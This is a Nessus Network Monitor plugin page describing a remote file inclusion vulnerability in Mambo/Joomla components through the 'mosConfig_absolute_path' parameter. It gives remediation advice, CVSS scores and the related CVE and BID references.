Mambo / Joomla Component / Module mosConfig_absolute_path Parameter Remote File Inclusion

Medium Nessus Network Monitor Plugin ID 3687


The remote web server contains a PHP application that is prone to remote file inclusion attacks.


The remote host contains a third-party Mambo / Joomla component or module. The version of at least one such component or module installed on the remote host fails to sanitize input to the 'mosConfig_absolute_path' parameter before using it to include PHP code. Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.


Disable PHP's 'register_globals' setting. Upgrade or patch according to vendor recommendations.

See Also

Plugin Details

Severity: Medium

ID: 3687

File Name: 3687.prm

Family: CGI

Published: 2006/07/24

Modified: 2016/01/21

Dependencies: 1442

Nessus ID: 22049

Risk Information

Risk Factor: Medium


Base Score: 5.8

Temporal Score: 5.2

Vector: CVSS2#AV:A/AC:L/Au:N/C:P/I:P/A:P

Temporal Vector: CVSS2#E:F/RL:W/RC:ND


Base Score: 6.3

Temporal Score: 6


Temporal Vector: CVSS3#E:F/RL:W/RC:X

Reference Information

CVE: CVE-2006-3846, CVE-2006-5048, CVE-2007-1702, CVE-2007-3130, CVE-2007-2144, CVE-2007-2319, CVE-2006-3396, CVE-2006-3530, CVE-2006-3556, CVE-2007-2005, CVE-2006-3774, CVE-2006-5045, CVE-2006-3748, CVE-2006-3749, CVE-2006-3750, CVE-2006-3751, CVE-2006-3773, CVE-2006-3947, CVE-2006-3949, CVE-2006-3980, CVE-2006-3995, CVE-2006-4074, CVE-2006-4130, CVE-2006-4195, CVE-2006-4270, CVE-2006-4288, CVE-2006-4553, CVE-2006-4858, CVE-2006-5519, CVE-2006-6962

BID: 24342, 24592, 23529, 23490, 23408, 23113, 23125, 19217, 19222, 19223, 19224, 19233, 19373, 19465, 19505, 19574, 19581, 19725, 20018, 20667, 18705, 18808, 18876, 18919, 18924, 18968, 18991, 19037, 19042, 19044, 19047, 19100